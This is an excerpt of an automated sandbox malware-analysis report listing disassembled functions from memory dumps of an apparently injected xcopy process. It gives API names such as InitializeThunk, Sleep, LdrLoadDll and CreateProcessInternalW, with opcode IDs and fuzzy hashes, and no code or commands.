                                                                                              • Instruction Fuzzy Hash: 109002A1203404035105B1588414616404A87E0201B55C431E1014590DC6668AA16225
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                              • Instruction ID: fa1dd6ab01b4986a56546a4edd638ef64cf5f35bdc66d6502c42edfce31d8cd8
                                                                                              • Opcode Fuzzy Hash: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                              • Instruction Fuzzy Hash: 8790027160640C02E150B1588414746004587D0301F55C421A0024654D87968B6577A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                              • Instruction ID: e33eda76f7ffd8ce495fe1e122ed623369aaa463a0f389e53bc82c75c887f526
                                                                                              • Opcode Fuzzy Hash: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                              • Instruction Fuzzy Hash: A790027120644C42E140B1588404A46005587D0305F55C421A0064694D97668F65B761
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
                                                                                              • Instruction ID: f0eaceb9904f4328ebefea665e5dfedb1ab19eaa079f13fd51891f6662e86a15
                                                                                              • Opcode Fuzzy Hash: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
                                                                                              • Instruction Fuzzy Hash: 4A90027120240C02E180B158840464A004587D1301F95C425A0025654DCB568B6977A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                              • Instruction ID: 9ea57f871ee0c3b49973dacde9b6278c883330dc9281d46240bb3b435e832dab
                                                                                              • Opcode Fuzzy Hash: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                              • Instruction Fuzzy Hash: A5900475313404031105F55C470450700C7C7D5351355C431F1015550CD773CF715331
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                              • Instruction ID: 36a16a8756a87d822bbccf24d003326af39dc2ec394350a3340b27672618c2f3
                                                                                              • Opcode Fuzzy Hash: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                              • Instruction Fuzzy Hash: F7900265222404021145F558460450B048597D6351395C425F1416590CC7628A755321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                              • Instruction ID: 2a161f0689fcce10fd5acc57274db915b7329b37ffcc50cd770f7b48e856df52
                                                                                              • Opcode Fuzzy Hash: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                              • Instruction Fuzzy Hash: AA9002A134240842E100B1588414B060045C7E1301F55C425E1064554D875ACE626226
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                              • Instruction ID: 243cde401026bc521ac985d341bbf63a0b82b74a1743ee3363b70deff9f5b539
                                                                                              • Opcode Fuzzy Hash: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                              • Instruction Fuzzy Hash: FE900261602404425140B168C8449064045ABE1211755C531A0998550D869A8A755765
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                              • Instruction ID: a63e1f6e6f7bf3037d4ccf7edcf15f916a179ab377bcd03228aa952e35a6dcf0
                                                                                              • Opcode Fuzzy Hash: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                              • Instruction Fuzzy Hash: 19900261212C0442E200B5688C14B07004587D0303F55C525A0154554CCA568A715621
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                              • Instruction ID: f6a9be2d9ece9b5418e2a51f7896d97d77551ddcc26c36433945a37a22ac4c58
                                                                                              • Opcode Fuzzy Hash: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                              • Instruction Fuzzy Hash: 8790026160240902E101B1588404616004A87D0241F95C432A1024555ECB668BA2A231
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                              • Instruction ID: 2df324633beec0a2fa315720990386f7677d689a21ff441fb7cca02d4eb48cee
                                                                                              • Opcode Fuzzy Hash: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                              • Instruction Fuzzy Hash: 239002A120280803E140B5588804607004587D0302F55C421A2064555E8B6A8E616235
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                              • Instruction ID: 6a4f5a84d6043e0b192641df798972165c76c222ec079c4de7bf2bfbe0d4f662
                                                                                              • Opcode Fuzzy Hash: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                              • Instruction Fuzzy Hash: 9090026921340402E180B158940860A004587D1202F95D825A0015558CCA568A795321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                              • Instruction ID: 07493e844f380bd46869fc7c1e9de46855435547739c4be9503aa1f7304814ca
                                                                                              • Opcode Fuzzy Hash: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                              • Instruction Fuzzy Hash: 4A90026130240403E140B15894186064045D7E1301F55D421E0414554CDA568A665322
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                              • Instruction ID: bbc2180d0c64bc8222e0ed8bf23b0f3e7ba72b30417c4310202d2e54dcfb314f
                                                                                              • Opcode Fuzzy Hash: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                              • Instruction Fuzzy Hash: 18900261243445526545F1588404507404697E0241795C422A1414950C86679A66D721
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                              • Instruction ID: 43f0da7c43171a7e671a1a048ab786d651238143d371c55ab27cb38ecb76ffc0
                                                                                              • Opcode Fuzzy Hash: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                              • Instruction Fuzzy Hash: 2A90027120240813E111B1588504707004987D0241F95C822A0424558D97978B62A221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a69be5f2651e3916a27b8a5a21279df481bf9df99f316160ad7f260f2088744d
                                                                                              • Instruction ID: 57e27a57e1baf839ed1c692e56b2b73cafee3bb420dc09ec42ce49434e2d1a8e
                                                                                              • Opcode Fuzzy Hash: a69be5f2651e3916a27b8a5a21279df481bf9df99f316160ad7f260f2088744d
                                                                                              • Instruction Fuzzy Hash: F790027120240C42E100B1588404B46004587E0301F55C426A0124654D8756CA617621
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6f597e4cd17903ba9bb60b272b8429c66744df5bf62304f3b6d1147b4e876c47
                                                                                              • Instruction ID: 2b3eec336510b876a2628d58aa11c9a798edb25f0c81e4669bafd3fa80beea40
                                                                                              • Opcode Fuzzy Hash: 6f597e4cd17903ba9bb60b272b8429c66744df5bf62304f3b6d1147b4e876c47
                                                                                              • Instruction Fuzzy Hash: DD90027120248C02E110B158C40474A004587D0301F59C821A4424658D87D68AA17221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: ba2e146a676a312edd5f2a5861336f3ac31307f639c136c0bc11bcfa61a3d09e
                                                                                              • Instruction ID: f2cb33da6f82951e19806490f8c15cf3de8c6090c4868230c815e351a213e8f9
                                                                                              • Opcode Fuzzy Hash: ba2e146a676a312edd5f2a5861336f3ac31307f639c136c0bc11bcfa61a3d09e
                                                                                              • Instruction Fuzzy Hash: 9990027120240802E100B5989408646004587E0301F55D421A5024555EC7A68AA16231
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: dff5ad99f7c7e11730ea7d1133c72cafb9b04ca88241f92f5df6d07ae0351451
                                                                                              • Instruction ID: 5da741adc4da85695537fd4982aeaf2e188c887e8fb722f1a95b030ed0676f58
                                                                                              • Opcode Fuzzy Hash: dff5ad99f7c7e11730ea7d1133c72cafb9b04ca88241f92f5df6d07ae0351451
                                                                                              • Instruction Fuzzy Hash: BC90027160650802E100B1588514706104587D0201F65C821A0424568D87D68B6166A2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 720c0fc5651517a61dbc5dc006484985adc256cf850188ae80ba386f49bf5f6d
                                                                                              • Instruction ID: f17cf69a8d370efce19ac0736d3f216edb776d198c086bd41eef5071e39a130d
                                                                                              • Opcode Fuzzy Hash: 720c0fc5651517a61dbc5dc006484985adc256cf850188ae80ba386f49bf5f6d
                                                                                              • Instruction Fuzzy Hash: 3790026124645502E150B15C84046164045A7E0201F55C431A0814594D86968A656321
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              • Opcode ID: 7e1eac16b90ea51255f7ab90855bf640700ac631a0e2b3d28d39fd85c25a4dea
                                                                                              • Instruction ID: 4c4c31de55aca5c984c0fbcb30216320762f8e0e9ead3e33539b5d01976c5fe1
                                                                                              • Opcode Fuzzy Hash: 7e1eac16b90ea51255f7ab90855bf640700ac631a0e2b3d28d39fd85c25a4dea
                                                                                              • Instruction Fuzzy Hash: EF3121B9A002099FDB00DFD8D8809EEB7B9FF88304B108559E619EB254D775EE458BA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              • Opcode ID: 053949eb5e7f0783de34caac6a7abd5c13432996971f1e4074902db6b3fc91c8
                                                                                              • Instruction ID: bd9fb47b4988994394e064d18e43ab816f0970d6251c855535ee84e350ce1b70
                                                                                              • Opcode Fuzzy Hash: 053949eb5e7f0783de34caac6a7abd5c13432996971f1e4074902db6b3fc91c8
                                                                                              • Instruction Fuzzy Hash: B43132B9A003099FDB00DFD8D8809EFB7B9FF88304B108559E609E7254D775EE458BA0
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 028239DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: wininet.dll
                                                                                              • API String ID: 3472027048-3354682871
                                                                                              • Opcode ID: d06eda08c34d269dcac06bfd1916a5b780b756a1dba65c7d422266a9fe637066
                                                                                              • Instruction ID: 5f7a8391355d0919a83c9cd927583256630ba56878f7e2c607e2af6c4ff42783
                                                                                              • Opcode Fuzzy Hash: d06eda08c34d269dcac06bfd1916a5b780b756a1dba65c7d422266a9fe637066
                                                                                              • Instruction Fuzzy Hash: 463190B9601705BBD714DFA4CC80FEBB7B9EB88704F00852DE61DAB241C3746694CBA1
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(E7AA48BB), ref: 028181DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: a9ad38294b1c5c242e062489075a775e7e998110f4d5ae558927ea205d851443
                                                                                              • Instruction ID: 5f375cb3fbfccd48c4e09a32607caf3c95e5057a45f86511ca873738edb3601d
                                                                                              • Opcode Fuzzy Hash: a9ad38294b1c5c242e062489075a775e7e998110f4d5ae558927ea205d851443
                                                                                              • Instruction Fuzzy Hash: 8E71EE7E4486958FE7178F78CC876997F69EB06228F1C46A9C895DF2C2D7218803C7A1
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814432
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 39d31df0b3dcb8a62abc9b7ab0a68387442d46fc0c5f4578072fdff3bb2400e6
                                                                                              • Instruction ID: bd47b889ae815244d4a62e0f21995a186c8657dc56847f7a9c8679a65cd0e358
                                                                                              • Opcode Fuzzy Hash: 39d31df0b3dcb8a62abc9b7ab0a68387442d46fc0c5f4578072fdff3bb2400e6
                                                                                              • Instruction Fuzzy Hash: 33011EBDD0020DABDB10EAE4DC41FAEB3B99B44708F008195E908E7281F671E759CB92
                                                                                              APIs
                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,0281816E,00000010,?,?,?,00000044,?,00000010,0281816E,?,?,?), ref: 02829670
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInternalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2186235152-0
                                                                                              • Opcode ID: 72162cf7a38d1e182989450252ff6fd47292c493cf9a29ff492c5210c1766369
                                                                                              • Instruction ID: 5f21cf3ad36361d4cf3f6e028a2fc5dc087a0d68d1e746929806c13df1d2fe9a
